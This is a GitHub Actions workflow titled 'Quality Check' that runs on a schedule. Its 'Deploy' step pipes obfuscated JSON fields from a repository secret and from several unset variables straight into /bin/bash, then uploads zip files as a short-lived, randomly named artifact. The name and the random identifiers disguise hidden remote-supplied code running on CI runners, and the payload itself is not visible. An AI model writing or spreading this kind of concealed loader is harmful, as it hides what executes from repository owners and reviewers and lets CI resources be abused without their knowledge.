name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '4 3,9,15,21 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Deploy
        env:
          j724: ${{ secrets.j724 }}
        run: |
          printf '%s' "$j724" | jq -r .bzgcu3091 | /bin/bash
          echo $xc8 | jq -r .f7171 | /bin/bash
          echo $qkhzt7 | jq -r .zepm15038 | /bin/bash
          printf '%s' "$thnut9" | jq -r .kr6 | /bin/bash
          printf '%s' "$mxqt34" | jq -r .ln814 | /bin/bash

      - name: Save results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: W0XdrqGQ
          path: "*.zip"
          retention-days: 1
